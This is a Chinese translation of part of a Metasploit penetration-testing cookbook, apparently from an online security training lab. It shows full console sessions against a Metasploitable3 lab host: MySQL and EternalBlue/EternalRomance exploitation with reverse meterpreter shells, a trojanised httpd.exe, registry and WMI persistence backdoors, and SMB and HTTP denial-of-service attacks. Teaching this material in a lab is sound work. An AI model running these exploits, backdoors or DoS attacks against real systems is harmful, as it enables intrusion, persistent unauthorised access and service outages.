Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(2)(翻译)

接上篇:Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(1)

5、利用公用服务

在漏洞攻击时,有些服务跟目标上其他大部分服务都有关系,而大多数是情况下它们被忽视了。

准备工作

在本节中,我们将利用目标环境中最常见和最容易被滥用的服务-Mysql。大多数情况下,我们可以利用Mysql服务,因为它们是出于开发目的安装的。忽略了一些安全加固。比如设置root密码或者设置强密码。

本节我们将使用Metasploitable3作为靶机

怎么做

要利用目标的Mysql服务,我们先使用MySQL枚举模块枚举目标,然后使用Oracle MySQL for the Microsoft Windows Payload攻击模块获取远程主机的shell

TIP:mysql_paylod模块在新版的Metasploit中被移除了。不过你可以从 https://www.exploit-db.com/download/16957下载这个模块,放到Metasploit对应的模块目录中(/usr/share/metasploit-framework/modules/exploits/windows/mysql),修改代码的前面几行为如下内容就行。

##                                                                        
# $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $                 
##                                                                        
                                                                          
##                                                                        
# This file is part of the Metasploit Framework and may be subject to     
# redistribution and commercial restrictions. Please see the Metasploit   
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/                                        
##                                                                        
                                                                          
require 'msf/core'                                                        
                                                                          
class MetasploitModule < Msf::Exploit::Remote                             
        Rank = ExcellentRanking                                           
                                                                          
        include Msf::Exploit::Remote::MYSQL                               
        include Msf::Exploit::CmdStager

枚举:

msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/admin/mysql/mysql_enum
msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
USERNAME => root
msf5 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.177.144

[*] 192.168.177.144:3306 - Running MySQL Enumerator...
[*] 192.168.177.144:3306 - Enumerating Parameters
[*] 192.168.177.144:3306 -      MySQL Version: 5.5.20-log
[*] 192.168.177.144:3306 -      Compiled for the following OS: Win64
[*] 192.168.177.144:3306 -      Architecture: x86
[*] 192.168.177.144:3306 -      Server Hostname: metasploitable3
[*] 192.168.177.144:3306 -      Data Directory: c:\wamp\bin\mysql\mysql5.5.20\data\
[*] 192.168.177.144:3306 -      Logging of queries and logins: OFF
[*] 192.168.177.144:3306 -      Old Password Hashing Algorithm OFF
[*] 192.168.177.144:3306 -      Loading of local files: ON
[*] 192.168.177.144:3306 -      Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.177.144:3306 -      Allow Use of symlinks for Database Files: YES
[*] 192.168.177.144:3306 -      Allow Table Merge:
[*] 192.168.177.144:3306 -      SSL Connection: DISABLED
[*] 192.168.177.144:3306 - Enumerating Accounts:
[*] 192.168.177.144:3306 -      List of Accounts with Password Hashes:
[+] 192.168.177.144:3306 -              User: root Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: 127.0.0.1 Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: ::1 Password Hash:
[+] 192.168.177.144:3306 -              User:  Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: % Password Hash:
[*] 192.168.177.144:3306 -      The following users have GRANT Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -      The following users have CREATE USER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have RELOAD Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SHUTDOWN Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SUPER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have FILE Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have PROCESS Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts have privileges to the mysql database:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      Anonymous Accounts are Present:
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -      The following accounts have empty passwords:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts are not restricted by source:
[*] 192.168.177.144:3306 -              User: root Host: %
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mysql/mysql_enum) >

进行攻击:

msf5> use exploit/windows/mysql/mysql_payload
msf5 exploit(windows/mysql/mysql_payload) > show options
msf5 exploit(windows/mysql/mysql_payload) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/mysql/mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/mysql/mysql_payload) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/mysql/mysql_payload) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/mysql/mysql_payload) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:3306 - Checking target architecture...
[*] 192.168.177.144:3306 - Checking for sys_exec()...
[*] 192.168.177.144:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
[*] 192.168.177.144:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   2.93% done (2998/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   4.40% done (4497/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   5.86% done (5996/102246 bytes)
......
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] 192.168.177.144:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:55358) at 2019-04-26 16:25:45 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

如果目标Mysql没有设置root密码,因此可以使用 MySQL服务上传shell并获得系统的远程访问权限。就像上面一样。所以,永远不要忘记对基础服务进行渗透测试。即便你认为不会有人傻到配置无密码的服务。

6、MS17-010 永恒之蓝 SMB远程代码执行Windows内核破坏

再次利用在信息收集和扫描阶段收集的信息,特别是MS17-010 SMB RCE检测辅助模块的输出信息,我们可以转向下一个易受攻击的服务。

准备工作

MS17-010 EthernalBlue SMB Remote Windows Kernel Pool Corruption攻击模块是Equation Group ETERNALBLUE的一部分。Equation Group ETERNALBLUEFuzzBunch toolkit的一部分。由Shadow Brokrs从美国国家安全局(NSA)获取并公开。ETERNALBLUE通常被认为是由NSA开发。它利用srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝从而造成缓冲区溢出,进而允许我们执行任意命令。它在被公开后被用在WannaCry勒索软件中进行攻击。此漏洞会影响所有运行SMBv1服务且未更新SMB安全补丁的Windows计算机和Windows服务器。

怎么做

载入ms17_010_eternalblue模块,设置目标IP地址,设置Payload,然后执行攻击

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Connecting to target for exploitation.
[+] 192.168.177.144:445 - Connection established for exploitation.
[+] 192.168.177.144:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.177.144:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.177.144:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.177.144:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.177.144:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.177.144:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.177.144:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.177.144:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.177.144:445 - Sending all but last fragment of exploit packet
[*] 192.168.177.144:445 - Starting non-paged pool grooming
[+] 192.168.177.144:445 - Sending SMBv2 buffers
[+] 192.168.177.144:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.177.144:445 - Sending final SMBv2 buffers.
[*] 192.168.177.144:445 - Sending last fragment of exploit packet!
[*] 192.168.177.144:445 - Receiving response from exploit packet
[+] 192.168.177.144:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.177.144:445 - Sending egg to corrupted connection.
[*] 192.168.177.144:445 - Triggering free of corrupted buffer.
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:49655) at 2019-04-26 17:40:54 +0800
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

7、MS17-010 EternalRomance/EternalSynergy/EternalChampion

MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution攻击模块也可用于MS17-0101漏洞利用。而且比EnternalBlue更可靠,不过需要命名管道。

怎么做

使用模块ms17_010_psexec

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.177.144:445 - Built a write-what-where primitive...
[+] 192.168.177.144:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.177.144:445 - Selecting PowerShell target
[*] 192.168.177.144:445 - Executing the payload...
[+] 192.168.177.144:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:62432) at 2019-04-28 09:37:48 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

8、安装后门

获取shell后,我们如果需要确保能持久性的访问目标系统,我们需要安装后门。

准备工作

通过之前的漏洞利用,我们已经获得了与目标机的session,我们将利用meterpreter session来安装后门服务。这里以httpd.exe为例。

meterpreter > ps -S httpd.exe           
Filtering on 'httpd.exe'                                                       
Process List                                                                                                                                   
============                                                                                                                                  
 PID   PPID  Name               Arch  Session  User                        Path                                                                
 ---   ----  ----               ----  -------  ----                        ----                                                                
 1304  1816  dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe  
 1816  472   dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe  
 3180  472   httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe                       
 3880  3180  httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe       
meterpreter >

接下来,我们将利用windows注册表持久性模块安装随系统启动的后门。

最后我们将利用WMI( Windows Management Instrumentation )创建一个无文件后门。

怎么做

1、不能在程序运行的时候安装后门,所以先杀死进程

meterpreter > kill 3880
Killing: 3880
meterpreter >

2、将需要替换成后门的程序下载下来

meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
[*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] download   : C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
meterpreter >

3、将会话退回到后台,使用reverse_tcp攻击载荷,使用generate生成后门文件。

msf5 exploit(windows/smb/ms17_010_psexec) > use payload/windows/x64/meterpreter/reverse_tcp
msf5 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-backdoored.exe
[*] Writing 29184 bytes to /root/httpd-backdoored.exe...
msf5 payload(windows/x64/meterpreter/reverse_tcp) >

关于generate的参数说明,可以查看帮助信息

msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce approproate NOPsled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -s <opt>  NOP sled length.
    -x <opt>  Specify a custom executable file to use as a template

4、启动一个监听,监听后门的反向连接,并使用expolit -j放到后台运行

msf5 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.177.143:4444
msf5 exploit(multi/handler) >

5、切回之前的meterpreter session,上传后门文件并重命名。

msf5 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > cd C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > mv httpd.exe httpd.exe.backup
meterpreter > upload /root/httpd-backdoored.exe
[*] uploading  : /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] uploaded   : /root/httpd-backdoored.exe -> httpd-backdoored.exe
meterpreter > mv httpd-backdoored.exe httpd.exe
meterpreter >

6、使用shell命令进入目标系统的shell,重启wampapache服务。

meterpreter > shell
Process 1976 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache
net stop wampapache
The wampapache service is stopping.net sta
The wampapache service was stopped successfully.
C:\wamp\bin\apache\apache2.2.21\bin>net start wampapache

[*] Sending stage (206403 bytes) to 192.168.177.144
net start wampapache
The wampapache service is starting.
The wampapache service was started successfully.

你会发现,服务启动后,返回了新的会话

C:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 4 opened (192.168.177.143:4444 -> 192.168.177.144:63068) at 2019-04-28 10:32:44 +0800
[*] Sending stage (206403 bytes) to 192.168.177.144
[*] Meterpreter session 5 opened (192.168.177.143:4444 -> 192.168.177.144:63069) at 2019-04-28 10:32:59 +0800
....
msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ METASPLOITABLE3         192.168.177.143:4444 -> 192.168.177.144:62506 (192.168.177.144)
  4         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63068 (192.168.177.144)
  5         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63069 (192.168.177.144)

msf5 exploit(multi/handler) >

7、使用Windows注册表持久化模块植入后门。我们利用永恒之蓝攻击获得的会话进行后门植入操作。

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/registry_persistence
smsf5 exploit(windows/local/registry_persistence) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/registry_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/registry_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/registry_persistence) > set LPORT 9999
msf5 exploit(windows/local/registry_persistence) > exploit

[*] Generating payload blob..
[+] Generated payload, 5944 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\cPH3pG4G
[+] Installed payload blob to HKCU\Software\cPH3pG4G\q3jhQYTs
[*] Installing run key
[-] Exploit aborted due to failure: unknown: Could not install run key
msf5 exploit(windows/local/registry_persistence) >

这里因为环境问题,并未植入成功。

8、如果成功,然后就可以设置监听,以便目标重启的时候获得反向shell会话

msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.177.143:9999
msf5 exploit(multi/handler) >

9、当目标机器重启后,可以获得会话

meterpreter > reboot
Rebooting...

10、利用WMI事件订阅创建无文件后门

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/wmi_persistence
msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/wmi_persistence) > set CALLBACK_INTERVAL 60000 //设置回调时间为1分钟
CALLBACK_INTERVAL => 60000
msf5 exploit(windows/local/wmi_persistence) > set EVENT_ID_TRIGGER 4624 //设置事件ID
EVENT_ID_TRIGGER => 4624
msf5 exploit(windows/local/wmi_persistence) > set USERNAME_TRIGGER Administrator //设置用户
USERNAME_TRIGGER => Administrator
msf5 exploit(windows/local/wmi_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
smsf5 exploit(windows/local/wmi_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/wmi_persistence) > set LPORT 4433
LPORT => 4433
msf5 exploit(windows/local/wmi_persistence) > exploit

[-] This module cannot run as System

11、提示未成功,我们可以使用migratemeterpreter shell进程进行进程迁移,就是将meterpreter shell进程迁移到相对稳定应用的进程里。

msf5 exploit(windows/local/wmi_persistence) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name                           Arch  Session  User                          Path
 ---   ----  ----                           ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                         x64   0
 232   4     smss.exe                       x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 300   472   svchost.exe                    x64   0        NT AUTHORITY\NETWORK SERVICE
 316   304   csrss.exe                      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 324   5624  explorer.exe                   x64   1        METASPLOITABLE3\vagrant       C:\Windows\Explorer.EXE
 .....
meterpreter > migrate -N explorer.exe //进程迁移不一定每次都能成功,可以多试几次
[*] Migrating from 1088 to 5624...
[*] Migration completed successfully.
meterpreter >

然后再次攻击

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/wmi_persistence) > exploit

[*] Installing Persistence...
[+]  - Bytes remaining: 12560
[+]  - Bytes remaining: 4560
[+] Payload successfully staged.
[+] Persistence installed! Call a shell using "smbclient \\\\192.168.177.144\\C$ -U Administrator <arbitrary password>"
[*] Clean up Meterpreter RC file: /root/.msf4/logs/wmi_persistence/192.168.177.144_20190428.2114/192.168.177.144_20190428.2114.rc
msf5 exploit(windows/local/wmi_persistence) >

注销目标机登录,然后重新登录,msfconsole这边就会接收到回连的会话

[*] Meterpreter session 2 opened (192.168.177.143:4433 -> 192.168.177.144:49437) at 2019-04-28 12:27:54 +0800

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

9、拒绝服务攻击

拒绝服务攻击通常是通过向目标机请求大量的资源或利用漏洞,造成拒绝服务攻击,消耗目标机器性能,拒绝服务攻击会导致合法用户无法访问计算机服务或资源,甚至可能会导致服务或操作系统崩溃。

准备工作

SMBloris是一个已经存在了20 年的 Windows SMB 漏洞,此漏洞可导致拒绝服务攻击( DoS ) , 使得大规模服务器瘫痪。影响所有版本的 SMB 协议以及所有Windows 2000 之后的系统版本。

怎么做

1、在进行SMBloris拒绝服务攻击之前,要先设置攻击机的最大连接数。

root@osboxes:~# ulimit -n 65535
root@osboxes:~# ulimit -n
65535
root@osboxes:~#

2、然后使用smb_loris模块来攻击目标机机器

msf5 auxiliary(dos/smb/smb_loris) > set RHOST 192.168.177.144
RHOST => 192.168.177.144
msf5 auxiliary(dos/smb/smb_loris) > run

[*] Starting server...
[*] 192.168.177.144:445 - 100 socket(s) open
[*] 192.168.177.144:445 - 200 socket(s) open
[*] 192.168.177.144:445 - 300 socket(s) open
[*] 192.168.177.144:445 - 400 socket(s) open
[*] 192.168.177.144:445 - 500 socket(s) open
[*] 192.168.177.144:445 - 600 socket(s) open
[*] 192.168.177.144:445 - 700 socket(s) open
[*] 192.168.177.144:445 - 800 socket(s) open
[*] 192.168.177.144:445 - 900 socket(s) open
[*] 192.168.177.144:445 - 1000 socket(s) open
[!] 192.168.177.144:445 - At open socket limit with 1017 sockets open. Try increasing you system limits.
[*] 192.168.177.144:445 - 1017 socket(s) open
[*] 192.168.177.144:445 - Holding steady at 1017 socket(s) open

3、查看目标机器,我们可以看到由于攻击者发送了大量的SMB请求消耗了目标机的大量内存。每一个 NBSS 连接可以申请分配 128 KB 内存空间,在建立大量连接的情况下可以耗尽内存,达到拒绝服务的效果。

image

另一个可怕的DoS攻击是MS15-034HTTP协议栈请求处理拒绝服务。

如果Microsoft Windows 7, Windows 8, Windows Server 2008, or Windows Server 2012机器正在运行了存在MS15-034漏洞的IIS服务,那么可以利用这个漏洞导致目标服务器崩溃。

msf5 > use auxiliary/dos/http/ms15_034_ulonglongadd
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > exploit

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) >
image

可以看到,目标死机蓝屏了。

相关实验在线学习

Metasploit攻击linux实例

Metasploit攻击winserver2008实例

第四章 Meterpreter (预告)

在本章中,我们将学习以下内容:

1、了解Meterpreter核心命令

2、了解Meterpreter文件系统命令

3、了解Meterpreter网络命令

4、了解Meterpreter系统命令

5、与目标建立多重通信信道

6、Meterpreter反取证

7、屏幕和键盘监听

8、使用 scraper Merterpreter脚本

9、使用 winenum 枚举系统信息

10、自动化脚本

11、Meterpreter资源脚本

12、Meterpreter超时控制

13、Meterpreter休眠控制

14、Meterpreter传输

15、注册表操作

16、加载框架插件

17、API和Mixins

18、Railgun——将Ruby转换为武器

19、向Railgun中添加DLL和函数定义

20、劫持远程VNC

21、开启远程桌面

说明

原书:《Metasploit Penetration Testing Cookbook - Third Edition》

https://www.packtpub.com/networking-and-servers/metasploit-penetration-testing-cookbook-third-edition

本文由合天网安实验室编译,转载请注明来源。

关于合天网安实验室

合天网安实验室(www.hetianlab.com)-国内领先的实操型网络安全在线教育平台

真实环境,在线实操学网络安全 ; 实验内容涵盖:系统安全,软件安全,网络安全,Web安全,移动安全,CTF,取证分析,渗透测试,网安意识教育等。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 157,198评论 4 359
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 66,663评论 1 290
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 106,985评论 0 237
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,673评论 0 202
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 51,994评论 3 285
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,399评论 1 211
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,717评论 2 310
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,407评论 0 194
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,112评论 1 239
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
